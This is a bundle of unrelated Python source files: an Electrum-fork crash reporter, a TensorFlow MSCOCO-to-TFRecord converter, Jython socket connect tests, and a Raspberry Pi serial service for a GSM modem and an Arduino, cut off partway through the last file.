    # tf.app.run parses flags and dispatches to main(_)
    tf.app.run()
|
base_crash_reporter.py | # Electrum - lightweight ILCOIN client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
    """Collects information about an uncaught exception and submits a crash
    report to the crash hub.

    GUI frontends subclass this and supply the interactive pieces
    (``get_user_description`` and ``get_wallet_type``).
    """
    report_server = "https://crashhub.electrum.org"
    config_key = "show_crash_reporter"
    issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
    CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
    CRASH_TITLE = _('Sorry!')
    REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
                             'useful debug information:')
    DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
    ASK_CONFIRM_SEND = _("Do you want to send this report?")

    def __init__(self, exctype, value, tb):
        """Store the (exc_type, exc_value, traceback) triple for later reporting."""
        Logger.__init__(self)
        self.exc_args = (exctype, value, tb)

    def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
        """Serialize the crash info and POST it to the crash hub.

        Raises if a forked altcoin still points at the electrum.org server, so
        foreign crash reports never reach the upstream tracker.
        """
        if constants.net.GENESIS[-4:] not in ["4943", "e26f"] and ".electrum.org" in BaseCrashReporter.report_server:
            # Gah! Some kind of altcoin wants to send us crash reports.
            raise Exception(_("Missing report URL."))
        report = self.get_traceback_info()
        report.update(self.get_additional_info())
        report = json.dumps(report)
        coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
        response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
        return response

    async def do_post(self, proxy, url, data):
        """POST *data* to *url* through *proxy*; returns the response body."""
        async with make_aiohttp_session(proxy) as session:
            async with session.post(url, data=data, raise_for_status=True) as resp:
                return await resp.text()

    def get_traceback_info(self):
        """Return a dict describing the exception: message, formatted stack,
        and an "id" (innermost frame + exception type) used for grouping."""
        exc_string = str(self.exc_args[1])
        stack = traceback.extract_tb(self.exc_args[2])
        readable_trace = "".join(traceback.format_list(stack))
        # local renamed from `id` to stop shadowing the builtin
        crash_id = {
            "file": stack[-1].filename,
            "name": stack[-1].name,
            "type": self.exc_args[0].__name__
        }
        return {
            "exc_string": exc_string,
            "stack": readable_trace,
            "id": crash_id
        }

    def get_additional_info(self):
        """Return environment info (versions, OS, wallet type, locale, user text)."""
        args = {
            "app_version": ELECTRUM_VERSION,
            "python_version": sys.version,
            "os": describe_os_version(),
            "wallet_type": "unknown",
            "locale": locale.getdefaultlocale()[0] or "?",
            "description": self.get_user_description()
        }
        # fix: narrowed from bare `except:` so SystemExit/KeyboardInterrupt
        # are no longer swallowed
        try:
            args["wallet_type"] = self.get_wallet_type()
        except Exception:
            # Maybe the wallet isn't loaded yet
            pass
        try:
            args["app_version"] = self.get_git_version()
        except Exception:
            # This is probably not running from source
            pass
        return args

    @staticmethod
    def get_git_version():
        """Return `git describe` output for the running checkout (raises if
        not running from a git working tree)."""
        # local renamed from `dir` to stop shadowing the builtin
        repo_dir = os.path.dirname(os.path.realpath(sys.argv[0]))
        version = subprocess.check_output(
            ['git', 'describe', '--always', '--dirty'], cwd=repo_dir)
        return str(version, "utf8").strip()

    def _get_traceback_str(self) -> str:
        return "".join(traceback.format_exception(*self.exc_args))

    def get_report_string(self):
        """Render the human-readable HTML report for preview."""
        info = self.get_additional_info()
        info["traceback"] = self._get_traceback_str()
        return self.issue_template.format(**info)

    def get_user_description(self):
        # implemented by GUI subclasses
        raise NotImplementedError

    def get_wallet_type(self) -> str:
        # implemented by GUI subclasses
        raise NotImplementedError
def trigger_crash():
    """Deliberately raise an exception on a background thread to exercise the
    crash reporter end-to-end."""
    # note: do not change the type of the exception, the message,
    # or the name of this method. All reports generated through this
    # method will be grouped together by the crash reporter, and thus
    # don't spam the issue tracker.
    class TestingException(Exception):
        pass

    def crash_test():
        raise TestingException("triggered crash for testing purposes")

    # raised on a separate thread so it reaches the thread excepthook
    # instead of unwinding the caller
    import threading
    t = threading.Thread(target=crash_test)
    t.start()
|
build_mscoco_data.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
from collections import namedtuple
from datetime import datetime
import json
import os.path
import random
import sys
import threading
import nltk.tokenize
import numpy as np
import tensorflow as tf
# Command-line flags: input/output locations, shard counts, and vocabulary
# construction parameters.
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
                       "Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
                       "Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
                       "Training captions JSON file.")
# BUG FIX: this default previously pointed at the *training* captions file
# (captions_train2014.json), silently reusing training captions as the
# validation set.
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_val2014.json",
                       "Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 256,
                        "Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
                        "Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
                        "Number of shards in testing TFRecord files.")
tf.flags.DEFINE_string("start_word", "<S>",
                       "Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
                       "Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
                       "Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
                        "The minimum number of occurrences of each word in the "
                        "training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
                       "Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
                        "Number of threads to preprocess the images.")

FLAGS = tf.flags.FLAGS

# Lightweight record tying an MSCOCO image id and file path to its captions.
ImageMetadata = namedtuple("ImageMetadata",
                           ["image_id", "filename", "captions"])
class Vocabulary(object):
    """Simple vocabulary wrapper mapping word strings to integer ids."""

    def __init__(self, vocab, unk_id):
        """Initializes the vocabulary.

        Args:
          vocab: A dictionary of word to word_id.
          unk_id: Id of the special 'unknown' word, returned for any word
            not present in vocab.
        """
        self._vocab = vocab
        self._unk_id = unk_id

    def word_to_id(self, word):
        """Returns the integer id of a word string (unk_id if unknown)."""
        return self._vocab.get(word, self._unk_id)
class ImageDecoder(object):
    """Decodes JPEG images using one shared TensorFlow session."""

    def __init__(self):
        # A single Session is reused for every decode call.
        self._sess = tf.Session()
        # Graph: a string placeholder fed raw JPEG bytes, decoded to RGB.
        self._encoded_jpeg = tf.placeholder(dtype=tf.string)
        self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)

    def decode_jpeg(self, encoded_jpeg):
        """Returns the decoded RGB array for the given encoded JPEG bytes."""
        decoded = self._sess.run(self._decode_jpeg,
                                 feed_dict={self._encoded_jpeg: encoded_jpeg})
        # Sanity checks: 3-D tensor, exactly three color channels.
        assert len(decoded.shape) == 3
        assert decoded.shape[2] == 3
        return decoded
def _int64_feature(value):
    """Wraps a single integer as an int64 Feature proto."""
    int64_list = tf.train.Int64List(value=[value])
    return tf.train.Feature(int64_list=int64_list)
def _bytes_feature(value):
    """Wraps a value as a bytes Feature proto (stringified first)."""
    bytes_list = tf.train.BytesList(value=[str(value)])
    return tf.train.Feature(bytes_list=bytes_list)
def _int64_feature_list(values):
    """Wraps a sequence of integers as an int64 FeatureList proto."""
    features = [_int64_feature(v) for v in values]
    return tf.train.FeatureList(feature=features)
def _bytes_feature_list(values):
    """Wraps a sequence of values as a bytes FeatureList proto."""
    features = [_bytes_feature(v) for v in values]
    return tf.train.FeatureList(feature=features)
def _to_sequence_example(image, decoder, vocab):
    """Builds a SequenceExample proto for an image-caption pair.

    Args:
      image: An ImageMetadata object holding exactly one caption.
      decoder: An ImageDecoder object used to sanity-check the JPEG data.
      vocab: A Vocabulary object.

    Returns:
      A SequenceExample proto, or None if the image file contains invalid
      JPEG data.
    """
    # BUG FIX: open in binary mode ("rb"). JPEG data is bytes; text mode
    # corrupts it on Python 3 and on platforms with newline translation.
    with tf.gfile.FastGFile(image.filename, "rb") as f:
        encoded_image = f.read()
    try:
        # Decode purely as a validity check; the decoded pixels are discarded.
        decoder.decode_jpeg(encoded_image)
    except (tf.errors.InvalidArgumentError, AssertionError):
        print("Skipping file with invalid JPEG data: %s" % image.filename)
        return
    context = tf.train.Features(feature={
        "image/image_id": _int64_feature(image.image_id),
        "image/data": _bytes_feature(encoded_image),
    })
    # _process_dataset splits metadata so each entry has a single caption.
    assert len(image.captions) == 1
    caption = image.captions[0]
    caption_ids = [vocab.word_to_id(word) for word in caption]
    feature_lists = tf.train.FeatureLists(feature_list={
        "image/caption": _bytes_feature_list(caption),
        "image/caption_ids": _int64_feature_list(caption_ids)
    })
    sequence_example = tf.train.SequenceExample(
        context=context, feature_lists=feature_lists)
    return sequence_example
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
                         num_shards):
    """Processes and saves a subset of images as TFRecord files in one thread.

    Args:
      thread_index: Integer thread identifier within [0, len(ranges)].
      ranges: A list of pairs of integers specifying the ranges of the dataset to
        process in parallel.
      name: Unique identifier specifying the dataset.
      images: List of ImageMetadata.
      decoder: An ImageDecoder object.
      vocab: A Vocabulary object.
      num_shards: Integer number of shards for the output files.
    """
    # Each thread produces N shards where N = num_shards / num_threads. For
    # instance, if num_shards = 128, and num_threads = 2, then the first thread
    # would produce shards [0, 64).
    num_threads = len(ranges)
    # num_shards must divide evenly across threads (also validated in main()).
    assert not num_shards % num_threads
    num_shards_per_batch = int(num_shards / num_threads)
    # Split this thread's [start, end) image range evenly into per-shard ranges.
    shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
                               num_shards_per_batch + 1).astype(int)
    num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
    counter = 0
    for s in xrange(num_shards_per_batch):
        # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
        shard = thread_index * num_shards_per_batch + s
        output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
        output_file = os.path.join(FLAGS.output_dir, output_filename)
        writer = tf.python_io.TFRecordWriter(output_file)
        shard_counter = 0
        images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
        for i in images_in_shard:
            image = images[i]
            # Returns None for images with invalid JPEG data; those are skipped.
            sequence_example = _to_sequence_example(image, decoder, vocab)
            if sequence_example is not None:
                writer.write(sequence_example.SerializeToString())
                shard_counter += 1
                counter += 1
            # Progress report every 1000 written records.
            if not counter % 1000:
                print("%s [thread %d]: Processed %d of %d items in thread batch." %
                      (datetime.now(), thread_index, counter, num_images_in_thread))
                sys.stdout.flush()
        writer.close()
        print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
              (datetime.now(), thread_index, shard_counter, output_file))
        sys.stdout.flush()
        shard_counter = 0
    print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
          (datetime.now(), thread_index, counter, num_shards_per_batch))
    sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
    """Processes a complete data set and saves it as a TFRecord.

    Args:
      name: Unique identifier specifying the dataset ("train"/"val"/"test").
      images: List of ImageMetadata.
      vocab: A Vocabulary object.
      num_shards: Integer number of shards for the output files.
    """
    # Break up each image into a separate entity for each caption; this is why
    # each image appears ~5 times in the output (see module docstring).
    images = [ImageMetadata(image.image_id, image.filename, [caption])
              for image in images for caption in image.captions]
    # Shuffle the ordering of images. Make the randomization repeatable.
    random.seed(12345)
    random.shuffle(images)
    # Break the images into num_threads batches. Batch i is defined as
    # images[ranges[i][0]:ranges[i][1]].
    num_threads = min(num_shards, FLAGS.num_threads)
    # NOTE(review): np.int is removed in NumPy >= 1.24; this would need plain
    # int on modern NumPy. Left unchanged here.
    spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
    ranges = []
    threads = []
    for i in xrange(len(spacing) - 1):
        ranges.append([spacing[i], spacing[i + 1]])
    # Create a mechanism for monitoring when all threads are finished.
    coord = tf.train.Coordinator()
    # Create a utility for decoding JPEG images to run sanity checks.
    decoder = ImageDecoder()
    # Launch a thread for each batch.
    print("Launching %d threads for spacings: %s" % (num_threads, ranges))
    for thread_index in xrange(len(ranges)):
        args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
        t = threading.Thread(target=_process_image_files, args=args)
        t.start()
        threads.append(t)
    # Wait for all the threads to terminate.
    coord.join(threads)
    print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
          (datetime.now(), len(images), name))
def _create_vocab(captions):
    """Creates the vocabulary of word to word_id.

    The vocabulary is saved to disk in a text file of word counts. The id of each
    word in the file is its corresponding 0-based line number.

    Args:
      captions: A list of lists of strings (tokenized captions).

    Returns:
      A Vocabulary object.
    """
    print("Creating vocabulary.")
    counter = Counter()
    for c in captions:
        counter.update(c)
    print("Total words:", len(counter))
    # Filter uncommon words and sort by descending count.
    word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count]
    word_counts.sort(key=lambda x: x[1], reverse=True)
    print("Words in vocabulary:", len(word_counts))
    # Write out the word counts file ("word count" per line, id = line number).
    with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
        f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
    print("Wrote vocabulary file:", FLAGS.word_counts_output_file)
    # Create the vocabulary dictionary. The unknown-word id is one past the
    # last known word id.
    reverse_vocab = [x[0] for x in word_counts]
    unk_id = len(reverse_vocab)
    vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])
    vocab = Vocabulary(vocab_dict, unk_id)
    return vocab
def _process_caption(caption):
    """Tokenizes a caption string and brackets it with start/end words.

    Args:
      caption: A string caption.

    Returns:
      A list of strings; the tokenized caption, beginning with
      FLAGS.start_word and ending with FLAGS.end_word.
    """
    words = nltk.tokenize.word_tokenize(caption.lower())
    return [FLAGS.start_word] + words + [FLAGS.end_word]
def _load_and_process_metadata(captions_file, image_dir):
    """Loads image metadata from a JSON file and processes the captions.

    Args:
      captions_file: JSON file containing caption annotations.
      image_dir: Directory containing the image files.

    Returns:
      A list of ImageMetadata, one entry per image (each carrying all of
      that image's tokenized captions).
    """
    with tf.gfile.FastGFile(captions_file, "r") as f:
        caption_data = json.load(f)
    # Extract the filenames.
    id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]
    # Extract the captions. Each image_id is associated with multiple captions.
    id_to_captions = {}
    for annotation in caption_data["annotations"]:
        image_id = annotation["image_id"]
        caption = annotation["caption"]
        id_to_captions.setdefault(image_id, [])
        id_to_captions[image_id].append(caption)
    # Every image must have at least one caption and vice versa.
    assert len(id_to_filename) == len(id_to_captions)
    assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
    print("Loaded caption metadata for %d images from %s" %
          (len(id_to_filename), captions_file))
    # Process the captions and combine the data into a list of ImageMetadata.
    # (Fixed "Proccessing" typo in the log message below.)
    print("Processing captions.")
    image_metadata = []
    num_captions = 0
    for image_id, base_filename in id_to_filename:
        filename = os.path.join(image_dir, base_filename)
        captions = [_process_caption(c) for c in id_to_captions[image_id]]
        image_metadata.append(ImageMetadata(image_id, filename, captions))
        num_captions += len(captions)
    print("Finished processing %d captions for %d images in %s" %
          (num_captions, len(id_to_filename), captions_file))
    return image_metadata
def main(unused_argv):
    """Entry point: loads MSCOCO metadata, builds the vocab, writes shards."""

    def _is_valid_num_shards(num_shards):
        """Returns True if num_shards is compatible with FLAGS.num_threads."""
        return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads

    # Shard counts must split evenly across the worker threads.
    assert _is_valid_num_shards(FLAGS.train_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
    assert _is_valid_num_shards(FLAGS.val_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
    assert _is_valid_num_shards(FLAGS.test_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
    if not tf.gfile.IsDirectory(FLAGS.output_dir):
        tf.gfile.MakeDirs(FLAGS.output_dir)
    # Load image metadata from caption files.
    mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
                                                      FLAGS.train_image_dir)
    mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
                                                    FLAGS.val_image_dir)
    # Redistribute the MSCOCO data as follows:
    #   train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
    #   val_dataset = 5% of mscoco_val_dataset (for validation during training).
    #   test_dataset = 10% of mscoco_val_dataset (for final evaluation).
    train_cutoff = int(0.85 * len(mscoco_val_dataset))
    val_cutoff = int(0.90 * len(mscoco_val_dataset))
    train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
    val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
    test_dataset = mscoco_val_dataset[val_cutoff:]
    # Create vocabulary from the training captions only (no val/test leakage).
    train_captions = [c for image in train_dataset for c in image.captions]
    vocab = _create_vocab(train_captions)
    _process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
    _process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
    _process_dataset("test", test_dataset, vocab, FLAGS.test_shards)


if __name__ == "__main__":
    tf.app.run()
|
test_socket_jy.py | import errno
import os
import socket
import ssl
import threading
import time
import unittest
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
from test import test_support
def data_file(*name):
    """Returns the path of a test-data file living next to this module."""
    here = os.path.dirname(__file__)
    return os.path.join(here, *name)

# PEM fixtures used by the SSL tests below.
CERTFILE = data_file("keycert.pem")   # combined key + certificate
ONLYCERT = data_file("ssl_cert.pem")  # certificate only
ONLYKEY = data_file("ssl_key.pem")    # private key only
def start_server():
    """Starts a throwaway threaded HTTP server on an ephemeral localhost port.

    Returns:
        A (server, thread) pair; the caller is responsible for calling
        shutdown() on the server and join() on the thread.
    """
    bind_address = ('127.0.0.1', 0)  # port 0 -> OS picks a free port

    class DaemonThreadingMixIn(ThreadingMixIn):
        daemon_threads = True

    class ThreadedHTTPServer(DaemonThreadingMixIn, HTTPServer):
        """Handle requests in a separate thread."""

    # The tests only connect and never issue HTTP requests, so the default
    # do-nothing handler is sufficient.
    server = ThreadedHTTPServer(bind_address, BaseHTTPRequestHandler)
    worker = threading.Thread(target=server.serve_forever)
    worker.daemon = True
    worker.start()
    return server, worker
class SocketConnectTest(unittest.TestCase):
    """Exercises non-blocking connect_ex() against a local HTTP server."""

    def setUp(self):
        # Fresh server per test; the port is ephemeral, so read it back.
        self.httpd, self.server_thread = start_server()
        self.address = self.httpd.server_name, self.httpd.server_port

    def tearDown(self):
        self.httpd.shutdown()
        self.server_thread.join()

    def do_nonblocking_connection(self, results, index):
        # Repeatedly poll connect_ex() on a non-blocking socket, recording
        # every errno observed until the connection reports established
        # (EISCONN). The attempt cap keeps a wedged connect from hanging.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setblocking(0)
        connect_errno = 0
        connect_attempt = 0
        while connect_errno != errno.EISCONN and connect_attempt < 10000:
            connect_attempt += 1
            connect_errno = sock.connect_ex(self.address)
            results[index].append(connect_errno)
            time.sleep(0.01)
        sock.close()

    def do_workout(self, num_threads=10):
        # Launch num_threads concurrent connectors; results[i] collects the
        # errno sequence observed by thread i.
        connect_results = []
        connect_threads = []
        for i in xrange(num_threads):
            connect_results.append([])
            connect_threads.append(threading.Thread(
                target=self.do_nonblocking_connection,
                name="socket-workout-%s" % i,
                args=(connect_results, i)))
        for thread in connect_threads:
            thread.start()
        for thread in connect_threads:
            thread.join()
        return connect_results

    def test_connect_ex_workout(self):
        """Verify connect_ex states go through EINPROGRESS?, EALREADY*, EISCONN"""
        # Tests fix for http://bugs.jython.org/issue2428; based in part on the
        # code showing failure that was submitted with that bug
        for result in self.do_workout():
            # First poll: connect either started (EINPROGRESS) or, rarely,
            # completed immediately (EISCONN).
            self.assertIn(result[0], {errno.EINPROGRESS, errno.EISCONN})
            self.assertEqual(result[-1], errno.EISCONN)
            # Everything in between must report "already in progress".
            for code in result[1:-1]:
                self.assertEqual(code, errno.EALREADY)
class SSLSocketConnectTest(unittest.TestCase):
    """Same workout as SocketConnectTest, but over TLS-wrapped sockets.

    NOTE(review): largely duplicates SocketConnectTest; a shared mixin
    would remove the repetition. Left as-is to keep this a doc-only pass.
    """

    def setUp(self):
        self.httpd, self.server_thread = start_server()
        # Wrap the listening socket so every accepted connection is TLS.
        # NOTE(review): ssl.wrap_socket is deprecated in modern Python in
        # favor of SSLContext.wrap_socket; fine for the Jython 2 target.
        self.httpd.socket = ssl.wrap_socket(
            self.httpd.socket,
            certfile=ONLYCERT,
            server_side=True,
            keyfile=ONLYKEY,
        )
        self.address = self.httpd.server_name, self.httpd.server_port

    def tearDown(self):
        self.httpd.shutdown()
        self.server_thread.join()

    def do_nonblocking_connection(self, results, index):
        # Same polling loop as the plain-socket variant, but the client
        # socket is wrapped with TLS (handshake on connect).
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setblocking(0)
        connect_errno = 0
        connect_attempt = 0
        sock = ssl.wrap_socket(sock, certfile=CERTFILE, do_handshake_on_connect=True)
        while connect_errno != errno.EISCONN and connect_attempt < 10000:
            connect_attempt += 1
            connect_errno = sock.connect_ex(self.address)
            results[index].append(connect_errno)
            time.sleep(0.01)
        sock.close()

    def do_workout(self, num_threads=10):
        # Launch num_threads concurrent connectors; results[i] collects the
        # errno sequence observed by thread i.
        connect_results = []
        connect_threads = []
        for i in xrange(num_threads):
            connect_results.append([])
            connect_threads.append(threading.Thread(
                target=self.do_nonblocking_connection,
                name="socket-workout-%s" % i,
                args=(connect_results, i)))
        for thread in connect_threads:
            thread.start()
        for thread in connect_threads:
            thread.join()
        return connect_results

    def test_connect_ex_workout(self):
        """Verify connect_ex states go through EINPROGRESS?, EALREADY*, EISCONN"""
        # Tests fix for http://bugs.jython.org/issue2428; based in part on the
        # code showing failure that was submitted with that bug
        for result in self.do_workout():
            self.assertIn(result[0], {errno.EINPROGRESS, errno.EISCONN})
            self.assertEqual(result[-1], errno.EISCONN)
            for code in result[1:-1]:
                self.assertEqual(code, errno.EALREADY)
class SocketOptionsTest(unittest.TestCase):
def test_socket_options_defined(self):
# Basic existence test to verify trivial fix for
# http://bugs.jython.org/issue2436
self.assertEqual(socket.SOL_TCP, socket.IPPROTO_TCP)
def test_main():
    # Drive all three test cases through Jython's test_support runner.
    test_support.run_unittest(SocketConnectTest, SSLSocketConnectTest, SocketOptionsTest)


if __name__ == "__main__":
    test_main()
|
serial_service.py | import time
import serial
import threading
def serial_service(serial_dict):
    """Opens the SIM (GSM) and UNO serial ports and supervises one
    translator thread per healthy port, recreating a translator whenever
    its thread dies.

    Args:
        serial_dict: Shared dict used as a mailbox between this service and
            its callers; health flags 'UNO_OK'/'SIM_OK' are published here.
    """
    # Connect to uno board and sim board.
    sim_serial = serial.Serial("/dev/ttyAMA0", 19200, timeout=1)
    uno_serial = serial.Serial("/dev/ttyUSB0", 115200, timeout=1)

    # Thread factories: a Python Thread object can only be start()ed once,
    # so supervision below builds a fresh Thread on every restart.
    def _new_uno_thread():
        return threading.Thread(target=uno_translator, args=(uno_serial, serial_dict))

    def _new_sim_thread():
        return threading.Thread(target=sim_translator, args=(sim_serial, serial_dict))

    # Check the connections and prepare the workers.
    uno_thread = None
    if uno_serial.isOpen():
        serial_dict['UNO_OK'] = True
        uno_thread = _new_uno_thread()
    else:
        serial_dict['UNO_OK'] = False

    sim_thread = None
    if sim_serial.isOpen():
        serial_dict['SIM_OK'] = True
        # Initial modem configuration: call-status reports, SMS text mode,
        # audio routing, volume.
        for cmd in ("AT+CLCC=1", "AT+CMGF=1", "AT+CHFA=1", "ATM6", "ATL6"):
            sim_serial.write(cmd.encode("utf-8"))
        sim_thread = _new_sim_thread()
    else:
        serial_dict['SIM_OK'] = False

    try:
        if uno_thread is not None:
            uno_thread.start()
        if sim_thread is not None:
            sim_thread.start()
        while True:
            # BUG FIX: the original called start() again on a dead Thread
            # (RuntimeError: threads can only be started once) and crashed
            # with AttributeError when a port was unavailable (thread None).
            # Recreate-and-start instead, and skip missing workers.
            if uno_thread is not None and not uno_thread.is_alive():
                serial_dict['UNO_OK'] = False
                uno_thread = _new_uno_thread()
                uno_thread.start()
            if sim_thread is not None and not sim_thread.is_alive():
                serial_dict['SIM_OK'] = False
                sim_thread = _new_sim_thread()
                sim_thread.start()
            time.sleep(1)
    except Exception:
        # Narrowed from a bare except (which also swallowed KeyboardInterrupt).
        print(">>>serialController:Something wrong! Can't open thread.")
def uno_translator(uno_serial, serial_dict):
    """Forever relays requests/telemetry between serial_dict and the UNO.

    Sends the "GPS" query when 'UNO_GPS' appears in serial_dict, and parses
    "KEY:int" telemetry lines (e.g. RATE:59, LNG:116403963, LAT:39915119)
    into serial_dict[KEY] = int.
    """
    while True:
        # Send message to UNO board when a GPS fix was requested.
        if 'UNO_GPS' in serial_dict.keys():
            AT = "GPS"
            uno_serial.write(AT.encode("utf-8"))
            del serial_dict['UNO_GPS']
            time.sleep(0.2)
        # Receive message from UNO board.
        count = uno_serial.inWaiting()
        if count != 0:
            recv = uno_serial.readline()
            recv = recv.decode().rstrip()
            # Telemetry lines have the form "KEY:value".
            AT = recv.split(':')
            if len(AT) != 2 or len(AT[1]) == 0:
                continue
            # Robustness fix: a garbled/non-numeric payload previously raised
            # ValueError and killed this thread; skip such lines instead.
            try:
                serial_dict[AT[0]] = int(AT[1])
            except ValueError:
                continue
def sim_translator(sim_serial, serial_dict):
    """Forever relays call requests and modem events between serial_dict
    and the SIM (GSM) module using AT commands.

    Known unsolicited responses handled: RING, NO DIALTONE/NO ANSWER,
    BUSY/NO CARRIER, +CLCC call-status lines, and +CMTI SMS notifications.
    """
    while True:
        # Make a call when one was requested.
        if 'SIM_ATD' in serial_dict.keys():
            AT = "ATD" + serial_dict['PHONE'] + ";"
            sim_serial.write(AT.encode("utf-8"))
            del serial_dict['SIM_ATD']
            time.sleep(0.5)
        # Begin to receive AT responses.
        count = sim_serial.inWaiting()
        if count != 0:
            recv = sim_serial.readline()
            recv = recv.decode().rstrip()
